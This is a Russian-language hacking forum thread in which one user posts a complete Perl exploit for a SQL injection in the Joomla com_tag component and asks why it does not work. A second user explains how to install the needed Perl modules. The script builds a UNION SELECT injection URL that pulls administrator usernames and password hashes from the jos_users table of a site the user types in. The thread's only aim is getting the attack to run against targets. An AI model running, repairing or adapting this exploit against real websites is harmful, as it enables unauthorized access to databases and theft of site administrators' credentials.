Вопрос по Perl

Discussion in 'PHP' started by c0mdrc, 31 Oct 2012.

  1. c0mdrc

    c0mdrc Banned

    Joined:
    27 Sep 2012
    Messages:
    24
    Likes Received:
    3
    Reputations:
    0
    Всем здрасти!
    Вопрос такой есть Exploit на perl
    которые качал все работают, а вот этот не работает, все перепробовал

    PHP:
    print "\t\t\n\n";
    print 
    "\t\n";
    print 
    "\t            Daniel Barragan  D4NB4R                \n";
    print 
    "\t                                                   \n";
    print 
    "\t      Joomla com_tag Remote Sql Exploit \n";
    print 
    "\t\n\n";
     
    use 
    LWP::UserAgent;
    use 
    IO::Socket
    use 
    LWP::Simple
    print 
    "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
     
    chomp(my $target=<STDIN>);
     
        
    #the username of  joomla
        
    $user="username";
        
    #the pasword of  joomla
        
    $pass="password";
        
    #the tables of joomla
        
    $table="jos_users";
        
    $d4n="com_tag&task";
        
    $component="tag&lang=es";
         
        
    $b LWP::UserAgent->new() or die "Could not initialize browser\n";
        
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
         
        
    $host $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
        
    $res $b->request(HTTP::Request->new(GET=>$host));
        
    $answer $res->content;
         
        if (
    $answer =~ /<user>(.*?)<user>/){
                print 
    "\nLos Datos Extraidos son:\n";
          print 
    "\n
          
    * Admin User : $1"
    ;
          
        }
         
        if (
    $answer =~/<pass>(.*?)<pass>/){print "\n
          
    * Admin Hash : $1\n\n"
    ;
          
        print 
    "\t\t#   El Exploit aporto usuario y password   #\n\n";}
        else{print 
    "\n[-] Exploit Failed, Intente manualmente...\n";}

    Вот ссылка откуда качал

    hxxp://www.exploit-db.com/download/22098/
     
  2. fix70

    fix70 New Member

    Joined:
    21 Aug 2012
    Messages:
    14
    Likes Received:
    1
    Reputations:
    1
    Привет,

    У меня ошибок интерпретатор не выдал.

    Проверь, чтобы были установлены модули
    LWP::UserAgent
    IO::Socket
    LWP::Simple

    Если что установи через cpan модули:
    1. запускаешь cpan.exe
    2. даешь по очереди команды
    install LWP::UserAgent
    install IO::Socket
    install LWP::Simple

    Если после запуска дает:
    [-] Exploit Failed, Intente manualmente...

    Значит цель не уязвима для данного эксплоита